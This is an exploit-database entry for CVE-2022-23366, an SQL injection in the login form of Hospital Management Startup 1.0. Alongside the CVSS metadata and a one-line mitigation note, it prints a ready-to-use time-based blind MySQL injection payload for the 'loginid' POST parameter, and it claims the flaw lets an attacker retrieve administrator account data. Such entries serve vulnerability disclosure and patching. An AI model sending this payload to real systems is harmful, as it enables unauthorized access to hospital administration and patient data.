header-logo
Suggest Exploit
vendor:
Hospital Management Startup
by:
nu11secur1ty
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Hospital Management Startup
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: CVE-2022-23366
CPE: a:kabirkhyrul:hospital_management_startup
Metasploit:
Other Scripts:
Platforms Tested:
2022

Hospital Management Startup 1.0 – ‘loginid’ SQLi

The loginid and password parameters from Hospital Management Startup 1.0 appear to be vulnerable to SQL injection attacks. The attacker can retrieve all information from the administrator account of the system and he can use the information for malicious purposes! WARNING: If this is in some external domain, or some subdomain, or internal, this will be extremely dangerous!

Mitigation:

Input validation and sanitization should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Hospital Management Startup 1.0 - 'loginid' SQLi
# Exploit Author: nu11secur1ty
# Date: 02.10.2022
# Vendor: https://github.com/kabirkhyrul
# Software: https://github.com/kabirkhyrul/HMS
# CVE-2022-23366

# Description:
The loginid and password parameters from Hospital Management Startup
1.0 appear to be vulnerable to SQL injection attacks.
The attacker can retrieve all information from the administrator
account of the system and he can use the information for malicious
purposes!
WARNING: If this is in some external domain, or some subdomain, or
internal, this will be extremely dangerous!

Status: CRITICAL


[+] Payloads:

```mysql
---
Parameter: loginid (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND
(SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND
'sDHP'='sDHP&rememberme=on&submit=Login
---

```
# Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366